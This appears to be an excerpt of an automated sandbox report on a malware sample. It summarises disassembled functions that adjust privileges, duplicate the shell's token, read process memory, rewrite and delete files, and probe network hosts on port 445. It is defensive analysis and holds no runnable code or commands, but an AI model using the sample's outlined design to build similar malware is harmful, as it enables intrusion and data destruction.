      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Mutex$CloseHandle$CreateObjectOpenReleaseSingleWait
      • String ID:
      • API String ID: 2599181272-0
      • Opcode ID: 8bee79aec459b1dd2adf6f6a06ac072569812e10d2a78dba4025f2b8e5e825ba
      • Instruction ID: 73f9b30f25896bdd7b121c324f5e0492f9b1c5702ebc3344b10924a816da11bd
      • Opcode Fuzzy Hash: 8bee79aec459b1dd2adf6f6a06ac072569812e10d2a78dba4025f2b8e5e825ba
      • Instruction Fuzzy Hash: 4DD012B2910329FFDF116B94EC0E88DBB29EF007647104151F90562171D771AE249BD0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00202FA7 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 283 202fa7-202fae call 2029f5 ExitProcess
      APIs
        • Part of subcall function 002029F5: GetTickCount.KERNEL32 ref: 00202A94
        • Part of subcall function 002029F5: GetLocaleInfoW.KERNEL32(00000800,00000058,?,00000020), ref: 00202AB4
      • ExitProcess.KERNEL32 ref: 00202FAE
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: CountExitInfoLocaleProcessTick
      • String ID:
      • API String ID: 1528680899-0
      • Opcode ID: 7ccd0ef1aec372bde666407a82e74cc03d94096ae75b6cc0d7e6847de9ccb7a4
      • Instruction ID: 94fcb532c2e2ec1675119eb58aefc4a9ac97d1a7d86994664056c69a696b25ce
      • Opcode Fuzzy Hash: 7ccd0ef1aec372bde666407a82e74cc03d94096ae75b6cc0d7e6847de9ccb7a4
      • Instruction Fuzzy Hash: 4A900221154319D6E2C06764680E70825115705706F914101B145540D35D5000145922
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203C7A Relevance: 1.5, APIs: 1, Instructions: 36COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 286 203c7a-203caa call 203bb3 call 2090c6 GetVolumeInformationW 291 203cac 286->291 292 203caf-203cbc call 2039da 286->292 291->292
      APIs
      • GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,002028D8,00000000,00000000), ref: 00203CA2
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: InformationVolume
      • String ID:
      • API String ID: 2039140958-0
      • Opcode ID: 92b8012519a14ae953a1e63b433c5cf4513c8a285c8b7240b054231002a69a9d
      • Instruction ID: c6f618dcd90350fbd3b28bbcde48b9bf7d947b91d983ce1c6ede3da5062c3147
      • Opcode Fuzzy Hash: 92b8012519a14ae953a1e63b433c5cf4513c8a285c8b7240b054231002a69a9d
      • Instruction Fuzzy Hash: 24E0EC72511224BDE7249B569D4ACFF7F7CDE82674710005AF405D6142E6706F11D5F1
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Function 00203DC0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47COMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(00000020,+# ,00000000,?,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203DD5
      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203DDC
      • LookupPrivilegeValueW.ADVAPI32(00000000,+# ,?), ref: 00203DEE
      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0020232B), ref: 00203E1D
      • CloseHandle.KERNEL32(+# ,?,?,?,?,?,?,?,0020232B,00000000), ref: 00203E2D
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
      • String ID: +# $+#
      • API String ID: 3038321057-2392861765
      • Opcode ID: 59dd36377d9864a1cac37a7dff00ae876eae2827562ce52f0462b1eb839ccf43
      • Instruction ID: 5b832b76e2063f429f34a188eed014976b616c46490b195da9693a94102501c8
      • Opcode Fuzzy Hash: 59dd36377d9864a1cac37a7dff00ae876eae2827562ce52f0462b1eb839ccf43
      • Instruction Fuzzy Hash: A0012576900329ABCB10DFA5EC4CAEFBFBDEF48310F004026EA05E2151D7348644CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00205D61 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109fileCOMMON
      Download Yara Rule
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00205DC6
      • FindNextFileW.KERNEL32(00000000,?,?,00000000,-00000002,00000002), ref: 00205E9C
      • FindClose.KERNEL32(00000000,?,00000000,-00000002,00000002), ref: 00205EAD
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Find$FileHeap$AllocCloseFirstNextProcess
      • String ID: .$.
      • API String ID: 719300460-3769392785
      • Opcode ID: cdc7fe7cc3dbe5e76d33088458de4dc65481fe7801611650f92b312aa4aa57c2
      • Instruction ID: f1e1dd98f8953ee378389ba4992b948dfbb653ded6a2a5b2f713f3ac01cb91e2
      • Opcode Fuzzy Hash: cdc7fe7cc3dbe5e76d33088458de4dc65481fe7801611650f92b312aa4aa57c2
      • Instruction Fuzzy Hash: A0315A35821B29BACF21AFA0DC49AEF77B9AF04311F148055F905A20D3E7758BA48E91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204B85 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 166pipeprocessfileCOMMON
      Download Yara Rule

      Control-flow Graph

      APIs
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00204C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 00204C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00204C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 00204C5D
      • CreateProcessW.KERNEL32 ref: 00204CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00204CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00204CE0
      • CloseHandle.KERNEL32(?), ref: 00204D07
      • CloseHandle.KERNEL32(?), ref: 00204D13
      • CloseHandle.KERNEL32(?), ref: 00204D22
      • CloseHandle.KERNEL32(?), ref: 00204D2E
      • CloseHandle.KERNEL32(?), ref: 00204D3A
      • CloseHandle.KERNEL32(?), ref: 00204D46
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      • Opcode ID: 60ce60ee395f995a5b5fee4cb0e2aea94b90c9eac16370c7b85944b3f57c1032
      • Instruction ID: d778dc9fda0c595201148464e1638a6663d8c60f173f544e5f9e8f422b0250e2
      • Opcode Fuzzy Hash: 60ce60ee395f995a5b5fee4cb0e2aea94b90c9eac16370c7b85944b3f57c1032
      • Instruction Fuzzy Hash: 32514BB2419346AFD711EF61DC44D9BBBECEF84760F004A2EB598821A1DB30D914CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00203EE1 Relevance: 24.2, APIs: 16, Instructions: 203libraryloaderCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 350 203ee1-203f14 call 206347 call 2090b5 355 203f19-203f2e call 2090b5 350->355 358 203f30-203f39 355->358 359 203f16 355->359 360 203f3e-203f53 call 2090b5 358->360 359->355 363 203f55-203f5e 360->363 364 203f3b 360->364 365 203f63-203f78 call 2090b5 363->365 364->360 368 203f60 365->368 369 203f7a-203fbd GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 365->369 368->365 370 204101-20411c CloseHandle call 2039b7 369->370 371 203fc3-203fc6 369->371 371->370 373 203fcc-203fcf 371->373 373->370 375 203fd5-203fd8 373->375 375->370 376 203fde-203fe0 375->376 376->370 377 203fe6-204001 GetCurrentProcessId OpenProcess 376->377 377->370 378 204007-204015 377->378 378->370 380 20401b-204030 ReadProcessMemory 378->380 380->370 381 204036-20404a ReadProcessMemory 380->381 381->370 382 204050-204089 GetModuleFileNameW 381->382 386 20408c-20409e ReadProcessMemory 382->386 387 2040a0-2040ba ReadProcessMemory 386->387 388 2040fb 386->388 387->388 389 2040bc-2040d2 call 205999 387->389 388->370 392 2040d4-2040d9 389->392 393 2040dd-2040f4 389->393 392->386 394 2040db 392->394 393->388 394->388
      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 00203F86
      • GetProcAddress.KERNEL32(00000000), ref: 00203F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203F98
      • GetProcAddress.KERNEL32(00000000), ref: 00203F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FA4
      • GetProcAddress.KERNEL32(00000000), ref: 00203FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 00203FB0
      • GetProcAddress.KERNEL32(00000000), ref: 00203FB3
      • GetCurrentProcessId.KERNEL32 ref: 00203FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 00203FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 0020402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 00204046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0020407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 0020409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 002040B6
      • CloseHandle.KERNEL32(000000FF), ref: 00204104
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      • Opcode ID: ec65de4955daee5783fd3c3a9946c85f075cf4a2e56ddaf08f9f565030256ea5
      • Instruction ID: 28cd06c6c0cfae5b3f984126293742e0f04bae7fbf66da5121b720f3fc8c2f0c
      • Opcode Fuzzy Hash: ec65de4955daee5783fd3c3a9946c85f075cf4a2e56ddaf08f9f565030256ea5
      • Instruction Fuzzy Hash: A8713AB1D1020AAFDF10AFA4DC48EEEBBB9EF48300F144056FA05B2192D7759A55CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00208782 Relevance: 21.3, APIs: 14, Instructions: 287fileCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 397 208782-2087cc call 208601 call 2090c6 402 2087e3-2087e7 397->402 403 2087ce-2087e1 397->403 404 2087e9-20880d GetFileAttributesW 402->404 403->404 405 208813-20881f GetFileAttributesW 404->405 406 208ae9-208af0 404->406 405->406 407 208825-208841 CreateFileW 405->407 407->406 408 208847-208864 SetFilePointerEx 407->408 409 208ab9-208ac8 CloseHandle 408->409 410 20886a-208870 408->410 412 208aca-208acd CloseHandle 409->412 413 208acf-208ad3 409->413 410->409 411 208876-208894 SetFilePointerEx 410->411 411->409 414 20889a-2088b9 CreateFileW 411->414 412->413 415 208ad5-208ad8 413->415 416 208ada-208ade 413->416 414->409 417 2088bf-2088d6 call 20669b 414->417 418 208ae3 DeleteFileW 415->418 416->406 419 208ae0 416->419 417->409 422 2088dc 417->422 418->406 419->418 423 208957-20896e ReadFile 422->423 424 208974 423->424 425 2088de-2088e4 423->425 426 208aa3-208ab6 call 208fa9 424->426 427 2088e6-20890a call 208fa9 425->427 428 20890d-208923 call 206432 425->428 426->409 427->428 428->426 435 208929-208940 WriteFile 428->435 435->426 436 208946-20894c 435->436 436->426 437 208952-208955 436->437 437->423 438 208979-208a1a call 208fd7 * 5 call 20669b 437->438 438->426 451 208a20-208a38 call 206432 438->451 451->426 454 208a3a-208a6a call 208fa9 WriteFile 451->454 454->426 457 208a6c-208a75 454->457 457->426 458 208a77-208a7b 457->458 459 208a86-208a8a 458->459 460 208a7d-208a85 call 2086b7 458->460 461 208a9c 459->461 462 208a8c-208a9a FlushFileBuffers * 2 459->462 460->459 461->426 462->461
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 002087F3
      • GetFileAttributesW.KERNEL32(?), ref: 00208816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00208835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 0020885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0020888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 002088AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00208938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00208966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 00208A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 00208A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 00208A9A
        • Part of subcall function 002086B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 002086EA
        • Part of subcall function 002086B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00208713
        • Part of subcall function 002086B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208737
        • Part of subcall function 002086B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00208766
      • CloseHandle.KERNEL32(?), ref: 00208AC2
      • CloseHandle.KERNEL32(000000FF), ref: 00208ACD
      • DeleteFileW.KERNEL32(?), ref: 00208AE3
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      • Opcode ID: 31cc8a125b48ecd708442ca40084ee78d6ed86aebec5d21e0b3ebc581b04a76e
      • Instruction ID: 4695a49690c77ee7d9ba542ae7ce680719674b70bef490181814456b14741075
      • Opcode Fuzzy Hash: 31cc8a125b48ecd708442ca40084ee78d6ed86aebec5d21e0b3ebc581b04a76e
      • Instruction Fuzzy Hash: 47B19C71A1030AAFDF118FA4DC49BEFBBB9BF08310F144125F944E6692EB319A64CB50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00205067 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 158networkCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 465 205067-2050bd htons call 20905b * 2 470 2050c3-2050c8 465->470 471 205219-20522f call 2090a1 * 2 465->471 470->471 473 2050ce-2050d0 470->473 475 2050d2-2050f6 htonl socket 473->475 476 205139-20513b 473->476 478 205131-205137 475->478 479 2050f8-20510a ioctlsocket 475->479 480 205141-20514d call 204fa9 476->480 481 20520d-205213 476->481 478->473 478->476 479->478 483 20510c-20511b connect 479->483 488 20514e-20515b 480->488 481->470 481->471 485 20512a-205130 483->485 486 20511d-205128 WSAGetLastError 483->486 485->478 486->478 486->485 489 2051e1-2051eb closesocket 488->489 490 205161-205184 getsockopt 488->490 489->488 492 2051f1 489->492 490->489 491 205186-205189 490->491 491->489 493 20518b-2051a0 recv 491->493 494 205207-20520b 492->494 495 2051a2-2051a8 WSAGetLastError 493->495 496 2051ab-2051ad 493->496 494->481 497 2051f3-205205 call 202084 494->497 495->496 498 2051b8-2051db getpeername 496->498 499 2051af-2051b6 496->499 497->471 497->494 501 2051de 498->501 499->498 499->501 501->489
      APIs
      • htons.WS2_32(000001BD), ref: 00205085
        • Part of subcall function 0020905B: GetProcessHeap.KERNEL32(00000008,00000000,002092F9,00000001,00000002,00000000,00000000,00203BCD,00000000,00000000,00000000,00000000,?,?,?,00203C8D), ref: 0020906C
        • Part of subcall function 0020905B: HeapAlloc.KERNEL32(00000000,?,00203C8D,00000017,00000000,00000000,?,?,?,002028D8,00000000,00000000,00000000), ref: 00209073
      • htonl.WS2_32(00000000), ref: 002050DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 002050EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00205102
      • connect.WS2_32(00000000,?,00000010), ref: 00205113
      • WSAGetLastError.WS2_32 ref: 0020511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 0020517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 00205195
      • WSAGetLastError.WS2_32 ref: 002051A2
      • getpeername.WS2_32(?,?,?), ref: 002051C9
      • closesocket.WS2_32(?), ref: 002051E3
      Strings
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1659685214-841204015
      • Opcode ID: efa02fcd5ca28a63541fca293f6f6beeb9959132defadbaa56fcccb912a4836f
      • Instruction ID: 67017fa87a833c3ddee76d990292f0e059ac27d8add72a88de1c5e09783a6a99
      • Opcode Fuzzy Hash: efa02fcd5ca28a63541fca293f6f6beeb9959132defadbaa56fcccb912a4836f
      • Instruction Fuzzy Hash: 25516F71D10719AFDF119FA4D889BEEFBB9EF04310F100429EA05A6192D7715AA0CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 002049D3 Relevance: 19.7, APIs: 13, Instructions: 160libraryloaderthreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 503 2049d3-204a5b call 206347 call 2090b5 call 209041 GetVersion call 208fa9 512 204a61-204a83 call 203d4b GetModuleHandleA GetProcAddress 503->512 513 204b3a-204b3d 503->513 520 204b24-204b33 call 203d4b 512->520 521 204a89-204a8c 512->521 515 204b44-204b47 513->515 516 204b3f-204b42 CloseHandle 513->516 518 204b49-204b4c CloseHandle 515->518 519 204b4e-204b51 515->519 516->515 518->519 522 204b53-204b56 CloseHandle 519->522 523 204b58-204b5b 519->523 520->513 534 204b35-204b38 CloseHandle 520->534 521->520 527 204a92-204a9d call 205b0e 521->527 522->523 524 204b62-204b65 523->524 525 204b5d-204b60 CloseHandle 523->525 528 204b70-204b84 call 2039b7 524->528 529 204b67-204b6f call 2090a1 524->529 525->524 527->520 538 204aa3-204aab GetShellWindow 527->538 529->528 534->513 538->520 539 204aad-204aba GetWindowThreadProcessId 538->539 539->520 540 204abc-204ad0 OpenProcess 539->540 540->520 541 204ad2-204ae5 OpenProcessToken 540->541 541->520 542 204ae7-204b06 DuplicateTokenEx 541->542 542->520 543 204b08-204b21 542->543 543->520
      APIs
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 00204A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 00204A71
      • GetProcAddress.KERNEL32(00000000), ref: 00204A78
      • CloseHandle.KERNEL32(?), ref: 00204B38
        • Part of subcall function 00205B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00205B3B,00000000,00000000,00000000,002037EB,00000000), ref: 00205B19
      • GetShellWindow.USER32 ref: 00204AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00204AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00204AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,00202B94), ref: 00204ADD
      • DuplicateTokenEx.ADVAPI32(00202B94,02000000,?,00000002,00000001,?), ref: 00204AFE
      • CloseHandle.KERNEL32(?), ref: 00204B42
      • CloseHandle.KERNEL32(?), ref: 00204B4C
      • CloseHandle.KERNEL32(00202B94), ref: 00204B56
      • CloseHandle.KERNEL32(?), ref: 00204B60
        • Part of subcall function 00203D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,002048E0,?), ref: 00203D8C
        • Part of subcall function 00203D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 00203DA1
      Memory Dump Source
      • Source File: 00000019.00000002.2229031564.0000000000201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00200000, based on PE: true
      • Associated: 00000019.00000002.2228938590.0000000000200000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229081645.000000000020A000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229246886.000000000020B000.00000004.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229328216.000000000020E000.00000002.00000001.01000000.00000007.sdmpDownload File
      • Associated: 00000019.00000002.2229369257.000000000020F000.00000008.00000001.01000000.00000007.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_25_2_200000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 4248481622-0
      • Opcode ID: d11a1e1faef43349bd61b46a5a67d0f5c8f257aca2b836baef850ea62dbe53ba
      • Instruction ID: e369c0f04ab48dfc12add288827bea64c55a711ac543c8cdaef410114c75a5c0
      • Opcode Fuzzy Hash: d11a1e1faef43349bd61b46a5a67d0f5c8f257aca2b836baef850ea62dbe53ba
      • Instruction Fuzzy Hash: AD513AB1C11319AFDB11AFA0DD49AEEBBB9FF08715F104066F604A2092D7319A55CFA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00204428 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 545 204428-20445e GetCurrentProcess OpenProcessToken 546 204464-204496 GetTokenInformation call 209041 GetTokenInformation 545->546 547 20452b-20452e 545->547 555 20452a 546->555 556 20449c-2044bb AllocateAndInitializeSid 546->556 548 204530-204533 FreeSid 547->548 549 204539-20453b 547->549 548->549 551 204544-20454a 549->551 552 20453d-204543 call 2090a1 549->552 552->551 555->547 556->555 558 2044bd-2044c1 556->558 558->555 559 2044c3-2044c6 558->559 560 2044c9-2044d9 EqualSid 559->560 561 2044e6-204514 LookupAccountSidW 560->561 562 2044db-2044e2 560->562 564 204523 561->564 565 204516-204521 GetLastError 561->565 562->560 563 2044e4 562->563 563->555 564->555 565->555 565->564
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 0020444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 00204456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,}I ,}I ,00000000), ref: 00204478
        • Part of subcall function 00209041: GetProcessHeap.KERNEL32(00000000,?,002062B1,00000030,?,00000040,00202A6F,0020B410), ref: 0020904D
        • Part of subcall function 00209041: HeapAlloc.KERNEL32(00000000), ref: 00209054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00204492
